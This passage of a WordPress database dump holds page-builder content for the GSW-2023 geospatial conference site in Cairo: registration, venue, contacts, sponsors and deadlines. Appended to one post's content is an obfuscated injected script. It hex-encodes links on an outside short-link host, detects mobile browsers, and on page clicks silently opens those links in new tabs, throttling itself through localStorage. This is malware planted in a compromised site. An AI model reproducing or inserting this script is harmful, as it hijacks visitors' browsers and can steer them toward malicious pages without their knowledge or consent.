bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:49:08','2023-04-22 12:49:08','',3066,'https://gsw2023.com/?p=4097',0,'revision','',0),
(4134,1,'2023-04-29 12:44:12','2023-04-29 12:44:12','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px 